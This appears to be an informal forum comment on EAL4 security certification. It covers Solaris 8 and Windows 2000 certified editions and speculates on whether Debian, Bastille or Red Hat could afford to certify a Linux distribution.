Solaris 8 has a special EAL4 version, but you (rightly) pay quite a premium for that version, as I understand it. In order to get something certified, you submit an exact copy of the system to be certified. If one bit (other than passwords, usernames, and groups) is different from what is certified (besides allowable changes specified in the certified end-user documentation), it's no longer EAL4 certified.
This is pretty hard-core stuff. THe previooous security record of Win2K doesn't really come into account, becuase the EAL version would be best described as aspecificconfiguration of an OS based on Win2K, not actually Win2K.
Debian is pretty hard core with quality standards. Bastille and Debian probably stand the best chance of beilng able to put together an EAL4 distro, but niether of them is that well off financially. RedHat has some quality issues, but should be able to put something together as good as the certified version of NT. I don't think the costs would be justified for RedHat right now, though. The chances are slim to none that you'll ever be able to serve web pages from an all-microsoft EAL4 system within a decade. I highly doubt that EAL4 version of Solaris 8 has a vebserver, at least one capable of dynamic content.